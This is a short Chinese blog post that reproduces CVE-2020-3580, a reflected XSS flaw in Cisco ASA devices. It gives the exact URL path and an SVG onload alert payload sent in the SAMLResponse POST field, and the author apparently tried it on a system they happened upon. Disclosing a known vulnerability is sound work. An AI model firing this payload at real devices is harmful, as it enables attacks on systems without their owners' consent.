路漫漫其修远兮,吾将上下而求索

导航

CISCO ASA设备的POST反射型XSS漏洞复现(CVE-2020-3580)

今天正好碰到这个系统,找了下存在这个漏洞,记录下
是这个界面的,就打开hackbar,注意url后面部分和post部分
URL部分
/+CSCOE+/saml/sp/acs?tgname=a
POST部分
SAMLResponse="><svg/onload=alert('XSSS')>
image
执行后就会弹窗
image

posted on 2022-06-09 22:16  爱在西元间  阅读(155)  评论(0编辑  收藏  举报